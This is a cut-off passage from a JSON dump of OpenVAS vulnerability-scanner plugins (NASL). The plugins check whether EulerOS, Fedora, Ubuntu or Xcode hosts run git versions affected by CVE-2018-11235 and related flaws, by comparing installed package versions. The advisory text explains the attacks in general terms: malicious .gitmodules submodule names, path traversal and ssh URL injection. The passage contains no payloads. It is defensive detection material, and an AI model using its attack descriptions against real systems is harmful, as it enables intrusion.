Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1385\");\n script_version(\"2020-01-23T11:41:17+0000\");\n script_cve_id(\"CVE-2017-1000117\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:41:17 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:41:17 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1385)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1385\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1385\");\n\n script_tag(name:\"summary\", value:\"The remote 
host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2019-1385 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\n\nA shell command injection flaw related to the handling of 'ssh' URLs has been discovered in Git. An attacker could use this flaw to execute shell commands with the privileges of the user running the Git client, for example, when performing a 'clone' action on a malicious repository or a legitimate repository containing a malicious commit.(CVE-2017-1000117)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~20.h1\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~20.h1\", 
rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:22", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1377)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2017-8386"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181377", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181377", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1377\");\n script_version(\"2020-01-23T11:23:49+0000\");\n script_cve_id(\"CVE-2017-8386\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:23:49 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:23:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1377)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1377\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1377\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2018-1377 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in the way git-shell handled command-line options for the restricted set of git-shell commands. 
A remote, authenticated attacker could use this flaw to bypass git-shell restrictions, to view and manipulate files, by abusing the instance of the less command launched using crafted command-line options.(CVE-2017-8386)\n\nIn Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS Virtualization 2.5.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~6.1.h4\", rls:\"EULEROSVIRT-2.5.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-02T00:00:00", "type": "openvas", "title": "Fedora Update for git FEDORA-2018-75f7624a9f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": 
"2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874636", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874636", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_75f7624a9f_git_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for git FEDORA-2018-75f7624a9f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874636\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-02 05:58:45 +0200 (Sat, 02 Jun 2018)\");\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-11233\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for git FEDORA-2018-75f7624a9f\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) 
announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\npresent on the target host.\");\n script_tag(name:\"affected\", value:\"git on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-75f7624a9f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZDKYTV3LSCNQMBQXEHWGWIWGJUILTTE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~2.17.1~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:36", "description": "This host is installed with Apple Xcode\n and is prone to code execution and information disclosure vulnerabilities.", "cvss3": {}, "published": "2018-06-14T00:00:00", "type": "openvas", "title": "Apple Xcode Code Execution And Information Disclosure Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813606", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813606", "sourceData": "###############################################################################\n# OpenVAS 
Vulnerability Test\n#\n# Apple Xcode Code Execution And Information Disclosure Vulnerabilities\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:xcode\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813606\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-11233\");\n script_bugtraq_id(104345, 104346);\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-14 10:59:39 +0530 (Thu, 14 Jun 2018)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Apple Xcode Code Execution And Information Disclosure Vulnerabilities\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Xcode\n and is prone to code execution and information disclosure vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n 
script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Git software does not properly validate submodule 'names' supplied via the\n untrusted .gitmodules file when appending them to the '$GIT_DIR/modules'\n directory.\n\n - An input validation flaw in processing path names on NTFS-based systems to\n read random memory contents.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code and to obtain sensitive information\n that may lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apple Xcode prior to version 9.4.1\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Xcode 9.4.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208895\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gather-package-list.nasl\", \"gb_xcode_detect_macosx.nasl\");\n script_mandatory_keys(\"ssh/login/osx_version\", \"Xcode/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || version_is_less(version:osVer, test_version:\"10.13.2\")){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nxcVer = infos['version'];\nxcpath = infos['location'];\n\nif(version_is_less(version:xcVer, test_version:\"9.4.1\"))\n{\n report = report_fixed_ver(installed_version:xcVer, fixed_version:\"9.4.1\", install_path:xcpath);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:23", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-07T00:00:00", 
"type": "openvas", "title": "Ubuntu Update for git USN-3671-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-11233"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310843545", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843545", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3671_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for git USN-3671-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843545\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-07 05:47:44 +0200 (Thu, 07 Jun 2018)\");\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-11233\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for git USN-3671-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Etienne Stalmans discovered that git did not properly validate git\nsubmodules files. A remote attacker could possibly use this to craft a\ngit repo that causes arbitrary code execution when 'git clone --recurse-submodules' is used. (CVE-2018-11235)\n\nIt was discovered that an integer overflow existed in git's pathname\nsanity checking code when used on NTFS filesystems. 
An attacker could\nuse this to cause a denial of service or expose sensitive information.\n(CVE-2018-11233)\");\n script_tag(name:\"affected\", value:\"git on Ubuntu 18.04 LTS,\n Ubuntu 17.10,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3671-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3671-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|17\\.10|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:1.9.1-1ubuntu0.8\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.14.1-1ubuntu4.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.17.1-1ubuntu0.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"git\", ver:\"1:2.7.4-0ubuntu1.4\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, 
"vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-06-02T00:00:00", "type": "openvas", "title": "Fedora Update for git FEDORA-2018-080a3d7866", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2017-15298", "CVE-2018-11233"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874638", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874638", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_080a3d7866_git_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for git FEDORA-2018-080a3d7866\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874638\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-02 05:59:40 +0200 (Sat, 02 Jun 2018)\");\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-11233\", \"CVE-2017-15298\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for git FEDORA-2018-080a3d7866\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"git on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-080a3d7866\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MWKTL7J5P3OQER7IUHIJXFASGGZMYKI5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~2.14.4~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-11T00:00:00", "type": "openvas", "title": "Fedora Update for git FEDORA-2018-1c1a318a0b", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-17456", "CVE-2018-11233"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875175", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875175", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_1c1a318a0b_git_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for git FEDORA-2018-1c1a318a0b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875175\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-11 08:54:28 +0200 (Thu, 11 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-11233\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for git FEDORA-2018-1c1a318a0b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n script_tag(name:\"affected\", value:\"git on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-1c1a318a0b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6H7PLJSU6HD57BAZTTAYHPWURRSQKM6V\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~2.17.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for git FEDORA-2018-29afefd172", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-17456", "CVE-2018-11233", "CVE-2018-19486"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875331", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875331", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_29afefd172_git_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for git FEDORA-2018-29afefd172\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
